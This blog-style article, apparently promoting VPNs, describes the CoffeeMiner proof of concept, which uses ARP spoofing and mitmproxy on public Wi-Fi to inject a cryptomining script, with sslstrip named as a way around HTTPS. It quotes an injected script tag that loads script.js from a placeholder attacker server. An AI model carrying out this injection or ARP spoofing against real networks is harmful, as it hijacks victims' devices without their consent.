CoffeeMiner: How Wi-Fi is hacked to mine cryptocurrency

Last updated: January 20, 2018

CoffeeMiner: How Wi-Fi is hacked to mine cryptocurrencyAn outside software developer, known as Arnau Code, posted a thought-provoking proof-of-concept ‘’CoffeeMiner’’. The incident that occurred in Buenos Aires a month ago inspired this specialist to post this project. Want to know the details of the proof-of-concept?

What was the incident that inspired Arnau to make the post?

Just a few words about the incident if you don’t keep abreast of the events.

It was found out that the local network of Starbucks coffee houses offers its visitors not just a connection to their Wi-Fi. They used the gadgets that were connected to it to mine cryptocurrency with the help of them.

Now let’s come back to Arnau’s CoffeMiner…

It is worth mentioning that the author publishes the CoffeeMiner concept and source codes solely as a theoretical academic research, which was created for educational and research purposes.

CoffeMiner has the same scenario as in Argentina’ Starbucks coffee houses and might be used in free Wi-Fi networks in other cafes. The concept is designed for spoofing the Address Resolution Protocol to catch intelligible data from gadgets on the same Wi-Fi network. The well-known mitmproxy tool is used for injection of HTML-code into unprotected traffic.

The scenario looks like this:

<script src = "http: // httpserverIP: 8000 / script.js» type = "text / javascript">> </ script>

As a result, JavaScript will be launched which will delay the victim’s CPU resources for mining.

CoffeMiner has the same scenario as in Argentina’ Starbucks coffee houses and might be used in free Wi-Fi networks in other cafes. The researcher used Coinhive (popular "browser" mining script) and mined the Montero cryptocurrency.

The specialist makes the point that such an attack can be easily automated. Though, in the current form CoffeeMiner doesn’t work with HTTPS, the solution for this is sslstrip, for instance.

As you remember, in the beginning of the post we called Arnau’s proof-concept ‘’thought-provoking’’? Why might it make users think? What should they think about?

When you get connected to free Wi-Fi in cafes or other places where they are available, your traffic must be encrypted. The encrypted traffic can’t be intercepted as hackers will have to decode it. If a data-encrypting protocol is reliable, it is a hard task to crack it.

What’s the best solution for encrypting your traffic while using free Wi-Fi networks?

Before connecting to free Wi-Fi spots, turn a VPN app on. The VPN will enable data encrypting, and your traffic will be hidden from prying eyes of virtual snoopers. But be sure to use the best and reliable VPN in 2018!

Feel free to share your thoughts about the article!